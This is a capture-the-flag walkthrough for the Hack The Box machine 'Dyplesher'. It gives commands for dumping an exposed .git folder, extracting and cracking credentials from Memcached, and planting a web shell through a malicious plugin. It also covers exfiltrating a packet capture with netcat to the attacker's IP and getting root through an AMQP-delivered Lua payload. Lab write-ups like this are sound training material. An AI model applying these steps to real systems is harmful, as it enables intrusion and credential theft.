HTB Walkthrough Dyplesher 10.10.10.190

Summary
Dyplesher is released on 23 th of may in 2020
Foothold
This machine was insane rated. in order to gain a foothold we had to dump .git folder.
User
After a lot of enumeration and a few logins we finally arrived to the login page where we can upload a malicious plugin so we can get a web shell with code execution, this way I could write my ssh key to this user and were able to login on the box, after looking around we see that we have a group called wireshark, this means we can intercept packets and read the output from it, After studying those files we got some new credentials and were able to get the user.txt
Root
Felamos his home folder contains a hint that there is a tool wich reviews the code automatically, after some research I found out this could be done with AMPQ. To get root we took advantage of the program AMPQ
Enumeration
Nmap
nmap -p- -A 10.10.10.190


Web
Going to http://10.10.10.190 shows:

http://10.10.10.190/login shows:

Nothing interesting to find on here
page showed ealier a host name test.dyplesher.htb adding test.dyplesher.htb to /etc/hosts

http://test.dyplesher.htb shows:

Couldn’t find anything on this page so i moved on.
http://10.10.10.190:3000 shows:

Also nothing to find right now
nmap result showed there should be a .git directory on port 80:

http://10.10.10.190/.git shows:

But since there is a vhost we should check this one as well:

Looks like something is there but no access time to poke around a bit.
Found something about git that there should be a way to dump git files, found the folowing tool:
https://github.com/internetwache/GitTools
mkdir gitdump
bash dumper.sh http://test.dyplesher.htb/.git/ /root/s3cwalk/dyplesher/gitdump/

We could extract some files

When we look into the index file we see the following:

Looks like this file has been removed, after some research there is a change we could restore thise files with git restore:
git restore index.php

We found some credentials for Memcached, this port was also open on the nmap so time to go poke around there.
Memcached
Getting vallues out of memcached:
memccat email –servers=10.10.10.190 –username=felamos –password=zxcvbnm

MinatoTW@dyplesher.htb
felamos@dyplesher.htb
yuntao@dyplesher.htb
memccat username –servers=10.10.10.190 –username=felamos –password=zxcvbnm

MinatoTW
felamos
yuntao
memccat password –servers=10.10.10.190 –username=felamos –password=zxcvbnm
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS
We found some value information, lets try now to decrypt these bcrypt hashes
hashcat64.exe -m 3200 hashes.txt rockyou.txt

$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1
We can now login to http://10.10.10.190:3000

When logged in there seems not much there but under releases there is a file called repo.zip

This file contains a folder repositories with bundle files types since this is a Repo let’s try to git clone them:

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
Git clone 6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

in this folder is a DB file which contains a hash:
s3cwalk/dyplesher/repositories/@hashed/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/user.db

$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6
Also bcrypt when we decrypt this one the password is alexis1
Next step is to find out where to login with it and with what username, from the web enumeration earlier there is still a page we weren’t able to login to so let’s try that one:
http://10.10.10.190/login

and we are logged in:

Time to develop our own malicious plugin


adding new java package:

adding new class:

adding plugin.yml:

also create pom.xml
plugin.yml contains:

main contains:

pom files contains:

Time to build jar file:

upload plugin

load plugin

check if plugin is loaded

visit: http://test.dyplesher.htb/secwalk.php?cmd=id

upload our ssh rsa key to MinatoTW:

login with ssh:

id shows that we can run wireshark, with wireshark we can intercept the network traffic
tshark -i any -w secwalk.pcap

sending file with netcat to my machine so i have a visual look with wireshark:
send: nc -w 3 10.10.14.12 11211 < secwalk.pcap
recieve: nc -l -p 11211 > secwalk.pcap
found credentials in AMQP packet:


and we got our first flag:

Felamos his home folder contains a hint for root privesc:

Ealier in the wireshark capture there were also creds availble for AMPQ service, this service does exactly what they mention here so lets try to exploit that.
Firs we need to create/edit an python script so we can connect with the service:

after this is done we create a lua file wich write our RSA ssh key to the root folder:
our lua payload file looks like:

python -m SimpleHTTPServer 5672
python3 shell.py http://10.10.14.12:5672/payload.lua
we can see the command was successful:

and we got root on the Box:

Job done
Made by: S3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.